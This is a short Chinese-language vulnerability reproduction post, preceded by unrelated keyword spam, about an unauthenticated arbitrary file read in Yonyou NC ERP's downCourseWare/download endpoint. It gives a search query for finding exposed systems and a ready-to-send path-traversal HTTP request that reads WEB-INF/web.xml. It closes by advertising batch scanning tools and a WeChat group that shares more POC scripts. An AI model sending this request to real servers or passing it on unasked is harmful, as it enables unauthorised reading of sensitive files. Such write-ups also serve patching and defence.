泰州泛亚信息做网站怎么样,网站开发与维护宣传册,微信公众号微网站 建设报价表,类似wordpress的应用0x01 产品简介
用友NC是一款企业级ERP软件。作为一种信息化管理工具#xff0c;用友NC提供了一系列业务管理模块#xff0c;包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等#xff0c;帮助企业实现数字化转型和高效管理。
0x02 漏洞概述
用友NC …0x01 产品简介
用友NC是一款企业级ERP软件。作为一种信息化管理工具用友NC提供了一系列业务管理模块包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等帮助企业实现数字化转型和高效管理。
0x02 漏洞概述
用友NC 系统 /portal/pt/downCourseWare/download接囗的fename参数存在任意文件读取漏洞未经身份认证的攻击者可以通过此漏洞获取敏感信息使系统处于极不安全状态。
0x03 搜索语法
app用友-UFIDA-NC0x04 漏洞复现
GET /portal/pt/downCourseWare/download?fileName../webapps/nc_web/WEB-INF/web.xmlpageIdlogin HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q0.9
Connection: close0x05 工具批量
nuclei afrog xray POC脚本获取
请使用VX扫一扫加入内部POC脚本分享圈子